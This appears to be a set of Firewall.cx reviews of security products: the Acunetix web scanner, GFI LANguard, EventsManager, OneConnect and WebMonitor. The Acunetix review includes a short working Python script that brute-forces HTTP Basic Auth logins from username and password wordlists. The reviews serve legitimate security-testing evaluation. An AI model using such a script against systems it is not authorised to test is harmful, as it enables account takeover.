As such, performing a security assessment without automation is an exercise in stupidity. One can use the lofty argument of the individual skill of the tester, and this is not to be discounted – I’ll come back to it – but, essentially, you can automate at least 80% of the task of assessing website security. This is part of the reason that security testing is becoming highly commoditized, the more you have to scan, the more repetitive tasks you have to perform. It is virtually impossible for a tester to manually analyze each and every single variable that needs to be tested. Even if it were so, to perform this iterative assessment manually would be foolishly time-consuming.

This problem, coupled with the explosive growth of web applications for business-critical functions, has resulted in a large array of web application security testing products. How do you choose a product that is accurate (false positives are a key concern), safe (we’re testing important apps), fast (we come back to the complexity point) and, perhaps most importantly, meaningful in its analysis?

This implies that its description of the vulnerabilities discovered, and the measures to be taken to mitigate them, must be crystal clear. This is essentially what you’re paying for: it doesn’t matter how good the scanning engine is or how detailed the threat database is if the output – risk description and mitigation – is not properly handled. With these points in mind, we at Firewall.cx decided to take Acunetix’s Web Vulnerability Scanner for a spin.

I’ve had the pleasure of watching the evolution of web scanning tools, right from my own early scripting in PERL, to the days of Nikto and libwhisker, to application proxies, protocol fuzzers and the like. At the outset, let me say that Acunetix’s product has been built by people who have understood this evolution. The designers of the product have been around the block and know exactly what a professional security tester needs in a tool like this. While this puppy will do point ’n’ shoot scanning with a wizard for newbies, it has all the little things that make it a perfect assistant to the manual tester.

A simple example of ‘the small stuff’ is the extremely handy encoder tool that can handle text conversions and hashing in a jiffy. Anyone who’s had the displeasure of having to whip up a base-64 decoder or resort to md5sum to obtain a hash in the middle of a test will appreciate why this is so useful. More importantly, it shows that the folks at Acunetix know that a good tester will be analyzing the results and tweaking the inputs away from what the scanning engine would do. Essentially they give you the leeway to plug your own intellect into the tool.
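For reference, the two chores mentioned – decoding base-64 and producing an MD5 hash – take only a few lines with Python’s standard library. This is simply the manual alternative the built-in encoder saves you from, not a peek inside Acunetix’s tool.

# The manual way to do what the encoder utility does in one click:
# base-64 decoding and MD5 hashing with the Python standard library.
import base64
import hashlib

encoded = "YWRtaW46cGFzc3dvcmQ="          # e.g. the credential blob from a Basic auth header
decoded = base64.b64decode(encoded).decode("utf-8")
print("decoded:", decoded)                 # admin:password

digest = hashlib.md5(decoded.encode("utf-8")).hexdigest()
print("md5:", digest)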

Usage is extremely straightforward: hit the icon and you’ll get a quick-loading interface that looks professional and displays information smartly (I appreciate the tabbed interfaces; these things matter, as a badly designed UI can overwhelm you with more information than you need). Here’s a shot of the target selection wizard:

reviews-acunetix-1

What I liked here was the ‘Optimize for the following technologies’ setup. Acunetix did a quick query of my target (our website, www.Firewall.cx) and identified PHP, mod_ssl, OpenSSL and FrontPage as modules that we’re using. When you’re going up against a blind target in a penetration test or setting up scans for 50 webapps at a time, this is something that you will really appreciate.

Next we come to the profile selection – which allows you to choose the scanning profile. Say I just want to look for SQL injection, I can pick that profile. You can use the profile editor to customize and choose your own checks. Standard stuff here. The profile and threat selection GUI is well categorized and it’s easy to find the checks you want to deselect or select.

reviews-acunetix-2

You can browse the threat database in detail as shown below:

reviews-acunetix-3

At around this juncture, the tool identified that www.Firewall.cx uses non-standard (non-404) error pages. This is extremely important for the tool to do. If it cannot determine the correct ‘page not found’ page, it will start throwing false positives on every single 302 redirect. This is a major problem with scanners such as Nikto and is not to be overlooked. Acunetix walked me through the identification of a valid 404 page. Perhaps a slightly more detailed explanation as to why this is important would benefit a newbie.
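
For the benefit of that newbie, the underlying idea is simple: request a page that almost certainly does not exist, record how the site responds, and use that response as the fingerprint of ‘page not found’ so later checks are not fooled by custom error pages. A rough Python sketch of the concept follows; it is my own illustration against a hypothetical host, not how Acunetix implements it internally:

import urllib.error
import urllib.request
import uuid

def fingerprint_not_found(base_url):
    """Request a random, almost certainly nonexistent path and record how
    the site answers, so later checks can tell a real page from a custom
    'page not found' page that still returns HTTP 200 or a redirect."""
    probe = f"{base_url}/{uuid.uuid4().hex}.html"
    try:
        with urllib.request.urlopen(probe) as resp:
            return {"status": resp.status, "body": resp.read()}
    except urllib.error.HTTPError as err:
        # A genuine 404 (or other error status) - nothing special to remember.
        return {"status": err.code, "body": err.read()}

if __name__ == "__main__":
    # Hypothetical target used purely for illustration.
    print(fingerprint_not_found("http://testsite.example.com")["status"])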

I had updated the tool before scanning, and saw the threat database being updated with some recent threats. I don’t know the threat update frequency, but the process was straightforward and, unlike many tools, didn’t require me to restart the tool with the new DB.

reviews-acunetix-4

Since I was more interested in the ‘how can I help myself’ as opposed to the ‘how can you help me’ approach to scanning, I fiddled with the fuzzer, request generator and authentication tester. These are very robust implementations – there are fully fledged tools built around just this functionality – and you should not be surprised to see more people discarding other tools and using Acunetix as a one-stop-shop toolbox.

One note though: the usernames dictionary for the authentication tester is far too limited out of the box (3-4 usernames). The password list was reasonably large, but the tool should include a proper default username list (where are things like ‘tomcat’, ‘frontpage’ etc.?) so as not to give people a false sense of security. Given that weak password authentication is still one of the top reasons for a security breach, this module could use a reworking. I would like to see something more tweakable, along the lines of Brutus or Hydra’s HTTP authentication capabilities. Perhaps the ability to plug in a third-party brute-force tool would be nice.
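
For context, the kind of dictionary attack this module automates is nothing more exotic than the loop below – a minimal Python sketch against a hypothetical lab host that you own, with placeholder wordlist filenames and the third-party ‘requests’ package assumed to be installed:

import requests  # third-party package, assumed installed

TARGET = "http://lab.example.com/protected/"   # hypothetical test host you own

def try_basic_auth(userfile, passfile):
    """Try every username/password combination against an HTTP Basic Auth
    protected URL and report the ones the server does not reject."""
    users = [line.strip() for line in open(userfile) if line.strip()]
    passwords = [line.strip() for line in open(passfile) if line.strip()]
    hits = []
    for user in users:
        for pwd in passwords:
            resp = requests.get(TARGET, auth=(user, pwd), timeout=10)
            if resp.status_code != 401:          # anything but 'Unauthorized'
                hits.append((user, pwd, resp.status_code))
    return hits

if __name__ == "__main__":
    for user, pwd, status in try_basic_auth("users.txt", "passwords.txt"):
        print(f"Accepted: {user}:{pwd} (HTTP {status})")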

Here I am playing with the HTTP editor:

reviews-acunetix-5

Here’s the neat little encoder utility that I was talking about earlier. You will not miss this one in the middle of a detailed test:

reviews-acunetix-6

After being satisfied that this product could get me through the manual phase of my audits, I fell back on my tester’s laziness and hit the scan button while sipping a Red Bull.

The results arrive in real time and are browseable, which is far better than seeing a progress bar creep forward arbitrarily. While this may seem cosmetic, when you’re being pushed to deliver a report, you want to be able to keep testing manually in parallel. I was watching the results come in and using the HTTP editor to replicate the responses and judge what required my manual intervention.

Essentially, Acunetix chews through the application looking for potential flaws and lets you take over to verify them in parallel. This is absolutely the right approach, and far more expensive tools that I’ve used do not realise this. Nobody with half smarts will rely purely on the output of a tool; a thorough audit will have the tester investigating areas of concern on his own. If I have to wait for your tool to finish everything it does before I can even see those half-results, you’ve wasted my time.

Here’s how the scanning window looked:

reviews-acunetix-7

Now bear in mind that I was running this test over a 256kbps link on the Internet, so I was expecting it to take time, especially given that Firewall.cx has an extremely large set of pages. Halfway through, I had to stop the test as it was bravely taking on the task of analyzing every single page in our forums. However, there was constant feedback through the activity window and my network interface, so you don’t end up wondering whether the product has hung, as is the case with many other products I’ve used.

The reporting features are pretty granular, allowing you to select the usual executive summary and detailed report options. Frankly, I like the way the results are presented and in the course of my audits never needed to generate a report from the tool itself. I’m certain that the features of the reporting module will more than suffice. The descriptions of the vulnerabilities are well written, the solutions are accurate and the links to more information come from authoritative sources. If you come back to what I said in the opening stages of this review, this is the most important information that a tool should look to provide. Nothing is more terrible than ambiguous results, and that is a problem you will not have with this product.

One drawback found with the product was the lack of a more complete scripting interface. Many testers would like the ability to add their own code to the scanning setup. I did check out the vulnerability editor feature, but would prefer something that gave me more flexibility. Another was the lack of a version for Linux / UNIX-like systems. The majority of security testers operate from these platforms, and it would be nice not to have to switch to a virtual machine or deal with a dual boot configuration to be able to harness the power of this tool. Neither of these drawbacks is a deal killer, and they should be treated more as feature requests.

Other than that, I truly enjoyed using this product. Web application auditing can be a tedious and time consuming nightmare, and the best praise I can give Acunetix is that they’ve made a product that makes me feel a part of the test. The interactivity and levels of detail available to you give you the ability to be laid back or tinker with everything you want, while the test is still going on. With its features and reasonable pricing for a consultant’s license, this product is unmatched and will quickly become one of the premier tools in your arsenal.


GFI LANguard Network Security Scanner Version 5.0 Review

In the light of all the recent attacks that tend to focus on the vulnerabilities of Windows platforms, we were increasingly dissatisfied with the common vulnerability scanners that we usually employ. We wanted a tool that didn't just help find holes, but would help administer the systems, deploy patches, view account / password policies etc. In short, we were looking for a Windows specialist tool.

Sure, there's a number of very popular (and very expensive) commercial scanners out there. However, most of them are prohibitively priced for the networks we administer, and all of them fell short on the administrative front. We tested a previous version of LANguard and our initial impressions were good. Thus we decided to give their latest offering a spin.

Getting Started

Getting the tool was easy enough: a quick visit to GFI's intuitively laid out site and a 10MB download later, we were set to go. We must mention that we're partial to tools that aren't too heavy on disk space. Sahir has started carrying around a toolkit on his cell-phone USB drive, where space is at a premium. 10MB is a reasonable size for a program with all the features of this one.

Installation was the usual Windows deal (click <next> and see how quickly you can reach <finish>). We fired up the tool and were greeted with a splash screen that checked for a newer version, and downloaded new patch detection files, dictionaries, etc.

reviews-gfi-languard-1

We'd prefer to have the option of updating rather than having it happen every time at startup, but we couldn't find a way to change this behaviour; this is a minor option that GFI should add.

Interface

Once the program is fully updated, you're greeted with a slick interface that looks like it's been made in .Net. No low-colour icons or cluttered toolbars here. While some may consider this inconsequential, it's a pleasure to work on software that looks good. It gives it that final bit of polish that's needed for a professional package. You can see the main screen below.

reviews-gfi-languard-2

The left panel shows all the tools available and is like an ‘actions' pane. From here you can select the security scanner, filter your scan results in a variety of ways, access the tools (such as patch deployment, DNS lookup, traceroute, SNMP audit, SQL server audit etc) and the program configuration as well. In fact if you look under the menus at the top, you'll find very few options as just about everything can be controlled or modified from the left panel.

The right panel obviously shows you the results of the scan, or the tool / configuration section you have selected. In this case it's in Security Scanner mode, where we can quickly set up a target and scan it with a profile. A profile is a description of what you want to scan for; the built-in profiles include:

  • Missing patches
  • CGI scanning
  • Only Web / Only SNMP
  • Ping them all
  • Share Finder
  • Trojan Ports
  • Full TCP & UDP port scan

In the Darkness, Scan ‘em...

We set up the default scanning profile and scanned our localhost (a mercilessly locked down XP box that resists spirited break-ins from our practice penetration tests). We scanned as the ‘currently logged on user' (an administrator account), which makes a difference, since you see a lot more when scanning with privileges than without. As we had expected, this box was fairly well locked down. Here is the view just after the scan finished:

reviews-gfi-languard-3

Clicking one of the filters in the left pane brings up a very nicely formatted report, showing you the information you requested (high vulnerabilities, low vulnerabilities, missing patches etc). Here is the full report:

reviews-gfi-languard-4

As you can see, it identified three open ports (no filtering was in place on the loopback interface) as well as MAC address, TTL, operating system etc.

We were not expecting much to show up on this highly-secured system, so we decided to wander further.

The Stakes Get Higher...

Target 2 is the ‘nightmare machine'. It is a box so insecure that it can only be run under VMware with no connection to the Internet. What better place to set LANguard free than on a Windows XP box, completely unpatched, completely open? If it were set up on the ‘net it would go down within a couple of minutes!

However, this was not good enough for our rigorous requirements, so we infected the box with a healthy dose of Sasser. Hopefully we would be able to finish the scan before LSASS.exe crashed, taking the system down with it. To make life even more difficult, we didn't give LANguard the right credentials as we had before. In essence, this was a 'no privilege' scan.

reviews-gfi-languard-5

LANguard detected the administrator account with no password, the Sasser backdoor, the default shares and active Terminal Services (we enabled it for the scenario). In short, it picked up on everything.

We purposely didn't give it any credentials as we wanted to test its patch deployment features last, since this was what we were really interested in. The results were very impressive, as more expensive scanners (notably Retina) missed out on a lot of things when given no credentials.

To further extend our scans, we thought it would be a good idea to scan our VLAN network that contained over 250 Cisco IP Phones and two Cisco Call Managers. LANguard was able to scan all IP Phones without a problem and also gave us some interesting findings as shown in this screenshot:

reviews-gfi-languard-6

LANguard easily detected the open HTTP port (80) and even included a sample of the actual page a client would download when connecting to the target host!

It is quite important to note at this point that the scan shown above was performed without any disruption to our Cisco VoIP network. Even though no vulnerabilities were detected, something we expected, we were pleased to see LANguard capable of working in our Cisco VoIP network without problems.

If you can't join them... patch them!

Perhaps one of the neatest features of GFI's LANguard is the patch management system, designed to automatically patch the systems you have previously scanned. The automatic patching system works quite well, but you should download the online PDF file that contains instructions on how to proceed should you decide to use this feature.

The automatic patching requires the host to be previously scanned in order to find all missing patches, service packs and other vulnerabilities. Once this phase is complete, you're ready to select the workstation(s) you would like to patch!

As expected, you need the appropriate credentials in order to successfully apply all selected patches, and for this reason there is a small field in which you can enter your credentials for the remote machine.

We started by selectively scanning two hosts in order to then patch one of them. The target host was 10.0.0.54, a Windows 2000 workstation that was missing a few patches:

reviews-gfi-languard-7

LANguard successfully detected the missing patches on the system as shown on the screenshot above, and we then proceeded to patch the system. A very useful feature is the ability to select the patch(es) you wish to install on the target machine.

reviews-gfi-languard-8

As suggested by LANguard, we downloaded the selected patch and pointed our program to install it on the remote machine. The screen shot above shows the patch we wanted to install, followed by the machine on which we selected to install it. At the top of the screen we needed to supply the appropriate credentials to allow LANguard to do its job, that is, a username of 'Administrator' and a password of ..... sorry - can't tell :)

Because most patches require a system reboot, LANguard includes reboot handling options, ensuring that no input at all is required on the remote side for the patching to complete. Advanced options such as ‘Warn user before deployment' and ‘Delete copied files from remote computer after deployment' are there to help cover all your needs:

reviews-gfi-languard-9

The deployment status tab is another smart feature; it allows the administrator to view the patching in progress. It clearly shows all steps taken to deploy the patch and will report any errors encountered.

It is also worth noting that we tried making life more difficult by running the patch management system from our laptop, which was connected to the remote network via the Internet and secured using a Cisco VPN tunnel with IPsec as the encryption protocol. Our expectation was that GFI's LANguard would fail terribly, giving us the green light to note a weak point of the program.

To our surprise, it seems GFI's developers had already foreseen such situations and the results were simply amazing, allowing us to successfully scan and patch a Windows 2000 workstation located at the other end of the VPN tunnel!

Summary

GFI without doubt has created a product that most administrators and network engineers would swear by. It's efficient, fast and very stable, able to perform its job whether you're working on the local or remote LAN.

Its features are very helpful: you won't find many network scanners pointing you to web pages where you can find out all the information on discovered vulnerabilities, download the appropriate patches and apply them with a few simple clicks of a mouse!

We've tried LANguard on everything from small networks with 5 to 10 hosts up to a large corporate network with more than 380 hosts, over WAN links and Cisco VPN tunnels, and it worked like a charm without creating problems such as network congestion. We are confident that you'll love this product's features and that it will quickly become one of your most necessary programs.


GFI EventsManager 7 Review

Imagine having to trawl dutifully through the event logs of twenty or thirty servers every morning, trying to spot those few significant events that could mean real trouble among that avalanche of operational trivia. Now imagine being able to call up all those events from all your servers in a single browser window and, with one click, open an event category to display just those events you are interested in…

Sounds good? Install this product, and you’ve got it.

A product of the well-known GFI stables, EventsManager 7 replaces their earlier LANguard Security Event Log Monitor (S.E.L.M.) which is no longer available. There’s also a Reporting Suite to go with it; but we haven’t reviewed that here.

In a nutshell the product enables you to collect and archive event logs across your organisation, but there’s so much more to it than that. It’s hard to condense the possibilities into a review of this size, but what you actually get is:

  • Automatic, scheduled collection of event logs across the network; not only from Windows machines but from Linux/Unix servers too, and even from any network kit that can generate syslog output;
  • The ability to group your monitored machines into categories and to apply different logging criteria to each group;
  • One tool for looking at event logs everywhere. No more switching the event log viewer between servers and messing around with custom MMCs;
  • The ability to display events by category or interest type regardless of where they occurred (for example just the Active Directory replication events, just the system health events, just the successful log-on events outside normal working hours);
  • Automated response actions for particular events or types of events including alerting staff by email or pager or running an external script to deal with the problem;
  • A back-end database into which you can archive raw or filtered events and which you can search or analyse against – great for legal compliance and for forensic investigation.

You can download the software from GFI’s website and, in exchange for your details, they’ll give you a thirty-day evaluation key that unlocks all the features; plenty of time to decide if it’s right for you. This is useful, because you do need to think about the deployment.

One key issue is the use of SQL Server as the database back-end. If you have an existing installation you can use that if capacity permits, or you could download SQL Server Express from Microsoft. GFI do tell you about this, but it’s hidden away in Appendix 3 of the manual, and an early section giving deployment examples might have been useful.

That said, once you have it installed, a handy wizard pops up to lead you through the key things you need to set up:

reviews-eventsmanager-1

Here again are things you’ll need to think about – such as who will get alerted, how, when and for what, and what actions need to be taken.

You’ll also need to give EventsManager a user that has administrative access to the machines you want to monitor and perhaps the safest way to do this is to set up a new user dedicated to that purpose.

Once you’ve worked through the wizard you can add your monitored machines under the various categories previously mentioned. Ready-made categories allow you to monitor according to the type, function or importance of the target machine and if you don’t like those you can edit them or create your own.

reviews-eventsmanager-2

The categories are more than just cosmetic; each one can be set up to define how aggressively EventsManager monitors the machines, their ‘working week’ (useful for catching unauthorised out-of-hours activity) and the types of events you’re interested in (you might not want Security logs from your workstations, for example). Encouragingly though, the defaults provided are completely sensible and can be used without worry.

reviews-eventsmanager-3

Once your targets are defined you’ll begin seeing logs in the Events Browser, and this is where the product really scores. To the left of the browser is a wealth of well-thought-out categories and types; click on one of these and you’ll see those events from across your enterprise. It’s as simple, and as wonderful as that.

reviews-eventsmanager-4

You can click on the higher-level categories to view, for example, all the SQL Server events, or you can expand that out and view the events by subcategory (just the Failed SQL Server Logons for example).

Again, if there are events of particular significance in your environment you can edit the categories to include them or even create your own, right down to the specifics of the event IDs and event types they collect. A particularly nice category is ‘Noise’, which you can use to collect all that day-to-day operational verbiage and keep it out of the way.

For maximum benefit you’ll also want to assign actions to key categories or events. These can be real-time alerts, emails, corrective action scripts and log archiving. And again, you guessed it, this is fully customisable. The ability to run external scripts is particularly nice as with a bit of tweaking you can make the product do anything you like.
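
To give a flavour of what such an external script might look like, here is a minimal Python example of my own. EventsManager’s exact mechanism for passing event details to a script is not covered in this review, so the command-line arguments, mail server and addresses below are placeholders: the script simply appends the event to a log file and emails the on-call administrator.

import smtplib
import sys
from datetime import datetime
from email.message import EmailMessage

SMTP_HOST = "mail.example.local"            # placeholder mail server
ALERT_FROM = "eventsmanager@example.local"  # placeholder addresses
ALERT_TO = "oncall@example.local"

def handle_event(source_host, event_id, description):
    """Append the event to a local log file and email the on-call admin."""
    line = f"{datetime.now().isoformat()} {source_host} {event_id} {description}\n"
    with open("critical-events.log", "a") as log:
        log.write(line)

    msg = EmailMessage()
    msg["Subject"] = f"Critical event {event_id} on {source_host}"
    msg["From"] = ALERT_FROM
    msg["To"] = ALERT_TO
    msg.set_content(description)
    with smtplib.SMTP(SMTP_HOST) as smtp:
        smtp.send_message(msg)

if __name__ == "__main__":
    # Hypothetical invocation: alert.py <host> <event id> <description...>
    handle_event(sys.argv[1], sys.argv[2], " ".join(sys.argv[3:]))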

reviews-eventsmanager-5

Customisation is one of the real keys to this product. Install it out of the box, just as it comes, and you’ll find it useful. But invest some time in tailoring it to suit your organisation and you’ll increase its value so much you’ll wonder how you ever managed without it.

In operation the product proved stable, though perhaps a little on the slow side when switching between screens and particularly when starting up. This is a testament to the fact that the product is doing a lot of work on your behalf and, to get the best from it, you really should give it a decent system to run on. The benefits you’ll gain will more than make up for the investment.


GFI OneConnect – Stop Ransomware, Malware, Viruses, and Email hacks Before They Reach Your Exchange Server

GFI Software has just revealed GFI OneConnect Beta – its latest Advanced Email Security Protection product. GFI OneConnect is a comprehensive solution that targets the safe and continuous delivery of business emails to organizations around the world.

GFI has leveraged its years of experience with millions of business users around the globe to create a unique hybrid solution, consisting of an on-premises server and a cloud-based service, that helps IT admins and organizations protect their infrastructure from spam, malware threats, ransomware, viruses and email service outages.

GFI OneConnect not only takes care of filtering all incoming email for your Exchange server but it also works as a backup service in case your Exchange server or cluster is offline.

The solution consists of the GFI OneConnect Server that is installed on the customer’s premises. The OneConnect server connects to the local Exchange server on one side, and the GFI OneConnect Data Center on the other side as shown in the diagram below:


Figure 1. Deployment model of GFI OneConnect (Server & Data Center)

Email sent to the organization’s domain is routed initially through GFI OneConnect. During this phase, email is scanned by the two antivirus engines (ClamAV & Kaspersky) for viruses, ransomware, malware etc. before being forwarded to the Exchange Server.

In case the Exchange server is offline, GFI OneConnect’s Continuity mode will send and receive all emails until the Exchange server is back online, after which all emails are automatically synchronised. All emails received while your email server was down remain available to users at any moment, thanks to the connection to the cloud and the GFI OneConnect Data Center.


Figure 2. GFI OneConnect Admin Dashboard (click to enlarge)

While the product is currently in beta, our first impressions show that this is an extremely promising solution that has been carefully designed with the customer and IT staff in mind. According to GFI, the best is yet to come – and we know that GFI always stands by its promises, so we are really looking forward to seeing the final version of this product in early 2017.

If you’ve been experiencing issues with your Exchange server continuity or have problems dealing with massive amounts of spam email, ransomware and other security threats – give the GFI OneConnect Beta a test run and discover how it can help offload all these problems permanently, leaving you time for other more important tasks.


Enforcing ICT Policies - How to Block Illegal & Unwanted Websites from your Users and Guests

Ensuring users follow company policies when accessing the internet has become a real challenge for businesses and IT staff. The legal implications for businesses not taking measures to enforce acceptable use policies (where possible) can become very complicated and businesses can, in fact, be held liable for damages caused by their users or guests.

A good example, found in almost every business around the world, is the offering of guest internet access to visitors. While they are usually unaware of the company’s ICT policies (nor do they really care about them) they are provided with free unrestricted access to the internet.

Sure, the firewall will only allow DNS, HTTP and HTTPS traffic in an attempt to limit internet access and its abuse but who’s ensuring they are not accessing illegal sites/content such as pornography, gambling, etc., which are in direct violation of the ICT policy?

This is where solutions like GFI WebMonitor help businesses cover this sensitive area, by quickly filtering website categories in a very simple and effective way that makes it easy for anyone to add or remove specific website categories or URLs.

How To Block Legal Liability Sites

Enforcing your ICT Internet Usage Policy via WebMonitor is a very simple and fast process. From the WebMonitor web-based dashboard, click on Manage and select Policies:

Note: Click on any image to enlarge it and view it in high-resolution

Figure 1. Adding a new Policy in GFI WebMonitor

At the next screen, click on Add Policy:

Figure 2. Click on the GFI WebMonitor Add Policy button

At the next screen add the desired Policy Name and brief description below:

Figure 3. Creating the Web Policy in GFI WebMonitor using the WEBSITE element

Now click and drag the WEBSITES element (on the left) into the center of the screen as shown above.

Next, configure the policy to Block traffic matching the filters we are about to create and optionally enable temporary access from users if you wish:

Figure 4. Selecting Website Categories to be blocked and actions to be taken

Under the Categories section click inside the Insert a Site Category field to reveal a drop-down list of the different categories. Select a category by clicking on it and then click on the ‘+’ symbol to add the category to this policy. Optionally you can click on the small square icon next to the ‘+’ symbol to get a pop-up window with all the categories.

Optionally select to enable full URL logging and then click on the Save button at the top right corner to save and enable the policy.

The new policy will now appear on the Policies dashboard:

enforce-ict-policies-block-illegal-and-unwanted-websites-5

Figure 5. Our new WebMonitor policy is now active

If for any reason you need to disable the policy, all you need to do is click on the green power button on the left and the policy is disabled immediately. This is a very handy feature that allows administrators to take immediate action when they notice unwanted effects from a new policy.

After the policy was enabled we tried accessing a gambling website from one of our workstations and received the following message on our web browser:


Figure 6. Our new policy blocks users from accessing gambling sites

The GFI WebMonitor Dashboard reporting Blocking/Warning hits on the company’s policies:


Figure 7. GFI WebMonitor reports our Internet usage ICT Policy is being hit (click for full dashboard image)

Summary

The importance of properly enforcing an ICT Internet Usage Policy cannot be overstated. It can save not only the company from legal implications, but also its users and guests from their own actions. Solutions such as GFI WebMonitor are designed to help businesses effectively apply ICT policies and control usage of high-risk resources such as the internet.


Minimise Internet Security Threats, Scan & Block Malicious Content, Application Visibility and Internet Usage Reporting for Businesses

For every business, established or emerging, the Internet is an essential tool which has proved to be indispensable. The usefulness of the internet can be counteracted by abuse of it, by a business’s employees or guests. Activities such as downloading or sharing illegal content, visiting high risk websites and accessing malicious content are serious security risks for any business.

There is a very easy way of monitoring, managing and implementing an effective Internet usage policy. GFI WebMonitor can not only provide the aforementioned, but also provide real-time web usage data. This allows for tracking bandwidth utilisation and traffic patterns. All this information can then be presented on an interactive dashboard. It is also an effective management tool, providing a business with the internet usage records of its employees.

Such reports can be highly customised to provide usage information based on the following criteria/categories:

  • Most visited sites
  • Most commonly searched phrases
  • Where most bandwidth is being consumed
  • Web application visibility

Some of the sources for web abuse that can be a time sink for employees are social media and instant messaging (unless the business operates at a level where these things are deemed necessary). Such web sites can be blocked.

GFI WebMonitor can also achieve other protective layers for the business by providing the ability to scan and block malicious content. WebMonitor helps the business keep a close eye on its employees’ internet usage and browsing habits, and provides an additional layer of security.

On its main dashboard, as shown below, the different elements help in managing usage and traffic source and targets:


Figure 1. WebMonitor’s Dashboard provides in-depth internet usage and reporting

WebMonitor’s main dashboard contains a healthy amount of information allowing administrators and IT managers to obtain important information such as:

  • See how many Malicious Sites were blocked and how many infected files were detected.
  • View the Top 5 Users by bandwidth
  • Obtain Bandwidth Trends such as Download/Upload, Throughput and Latency
  • Number of currently active web sessions.
  • Top 5 internet categories of sites visited by the users
  • Top 5 Web Applications used to access the internet

Knowing which applications are used to access the internet is very important to any business. Web applications like YouTube, Bittorrent, etc. can be clearly identified and blocked, providing IT managers and administrators a ringside view of web utilisation.

On the flip side, if a certain application or website is blocked and a user tries to access it, he/she will encounter an Access Denied page rendered by GFI WebMonitor. This notification should be enough for the user to be deterred from trying it again:


Figure 2. WebMonitor effectively blocks malicious websites while notifying users trying to access it

For the purpose of this article, a deliberate attempt was made to download an ISO file using BitTorrent. The download page was covered by the block policy, so GFI WebMonitor not only blocked the user from accessing the file, it also displayed the violation, stating the user’s machine IP address and the policy that was violated. This is a clear demonstration of how effective the management of web applications can be.

Some of the other great dashboards include bandwidth insight. The following image shows the total download and upload for a specific period. The projected values and peaks can be easily traced as well.

Figure 3. WebMonitor’s Bandwidth graphs help monitor the organisation’s upload/download traffic (click to enlarge)

Another useful dashboard is that of activity. This provides information about total users, their web request, and a projection of the next 30 days, as shown in the following image:

Figure 4. WebMonitor allows detailed tracking of current and projected user web requests with very high accuracy (click to enlarge)

The Security dashboard is perhaps one of the most important. This shows all the breaches based on category, type and top blocked web based applications that featured within certain policy violations.

Figure 5. The Security dashboard allows tracking of web security incidents and security policy violations (click to enlarge)

Running Web Reports

The easiest way to manage and produce the information gathered is to run reports. The various categories provided allow the user to run and view information of Internet usage depending on management requirements. The following image shows the different options available on the left panel:

Figure 6. WebMonitor internet web usage reports are highly customisable and provide detailed information (click to enlarge)

But often management would rather take the pulse of the current situation. GFI WebMonitor caters to that requirement very well. The best place to look for instant information on certain key aspects of resource usage is the Web Insights section.

If management wanted to review the bandwidth information, the following dashboard would give that information readily:

Figure 7. The Web Insight section keeps an overall track of internet usage (click to enlarge)

This provides a percentage view of how much data is downloaded versus uploaded.

Security Insights shows all current activities and concerns that need attention:

Figure 8. WebMonitor Security Insights dashboard displaying important web security reports (click to enlarge)

Conclusion

There is no doubt that GFI WebMonitor is a very effective tool that allows businesses to monitor and control internet access for employees, guests and other internet users. Its intuitive interface allows administrators and IT managers to quickly obtain the information they require and to put the necessary security policies in place to minimise security threats and internet resource abuse.


Increase your Enterprise or SMB Organization Security via Internet Application & User Control. Limit Threats and Internet Abuse at the Workplace

In this era of constantly pushing for more productivity and greater efficiency, it is essential that every resource devoted to web access within a business is utilised for business benefit. Unless the company concerned is in the business of gaming or social media, etc., it is unwise to use resources like internet/web access, and the infrastructure supporting it, for a purpose other than business. Like they say, “Nothing personal, just business”.

With this in mind, IT administrators have their hands full ensuring management of web applications and their communication with the Internet. The cost of not ensuring this is loss of productivity, misuse of bandwidth and potential security breaches. As a business it is prudent to block any unproductive web application e.g. gaming, social media etc. and restrict or strictly monitor file sharing to mitigate information leakages.

It is widely accepted that in this area firewalls are of little use. Port blocking is not the preferred solution, as it has a similar effect to a sledgehammer. What is required is the fineness of a scalpel to parse out the business usage from the personal and manage those business requirements accordingly. To be able to manage web applications at such a level, it is essential to be able to identify and associate each request with its respective web application. Anything in line with business applications goes through; the rest is blocked.

This is where WebMonitor excels in terms of delivering this level of precision and efficiency. It identifies access requests from supported applications using inspection technology and helps IT administrators to allow or block them. Hence, the administrators can allow certain applications for certain departments while blocking certain other applications as part of a blanket ban, thus enhancing the browsing experience of all users.

So, to achieve this, the process is to use the unified policy system of WebMonitor. The policies can be configured specifically for application control or, within the same policy, several application controls can be combined using other filtering technologies.

Let’s take a look at the policy panel of WebMonitor:

Figure 1. WebMonitor Policy Panel interface. Add, delete, create internet access policies with ease (click to enlarge)

In order to discover the controls that are available for a certain application, the application needs to be dragged into the panel. For example, if we were to create a policy to block Google Drive, we would drag that application into the panel itself.

Once the related controls show up, we can select an application or application category the policy will apply to.

The rest of the configuration from this point will allow creating definitions for the following:

  • Filter options
  • Scope of the policy
  • Actions to be taken
  • Handling of exceptions
  • Managing notifications

All of the above are ready to be implemented in a drag-and-drop fashion. GFI WebMonitor will commence controlling the configured application’s access to the Internet the moment the policy is saved.

So, going back to the example of creating the ‘block Google Drive’ policy, the steps are quite simple:

1. Click on ‘Add Policy’ as shown in the following image:

gfi-webmonitor-internet-application-user-control-2

Figure 2. Click on the “Add Policy” button to begin creating a policy to block internet access

2. Enter a Name and description in the relevant fields:

Figure 3. Adding policy name and description in WebMonitor to block an application network-wide (click to enlarge)

3. As this policy applies to ‘all’, there is no need to configure the scope at this point. The scope can be set on a per-user, per-group or per-IP-address basis.

4. Drag in the Application Block element from the left panel (as shown in the following image), then select ‘Block’ in the ‘Allow, Block, Warn, Monitor’ section.

5. In the Application Category section, select ‘File Transfer’ as shown in the image below:

Figure 4. WebMonitor: Blocking the File Transfer application category from the internet (click to enlarge)

6. Click on the ‘Applications’ tab and start typing ‘Google Drive’ in the field. The drop-down list will include Google Drive. Select it and then press Enter. The application will be added. Now click on Save.

We need to keep in mind that the policy is operational the moment the Save button, located at the top right corner, is clicked.

Now if any user tries to access the Google Drive web application, he/she will be presented with the ‘Block Page’ rendered by GFI WebMonitor. At the same time, any Google Drive thick client installed on the user’s machine will not be able to connect to the Internet.

As mentioned earlier, and reiterated through the above steps, the process of creating and implementing a web access management policy in WebMonitor is quite simple. Given the length and breadth of configuration options within the applications and the scope, this proves to be a very powerful tool that will make the task of managing and ensuring proper usage of web access simple and effective for IT administrators in small and large enterprise networks.


GFI WebMonitor Installation: Gateway / Proxy Mode, Upgrades, Supported O/S & Architectures (32/64bit)

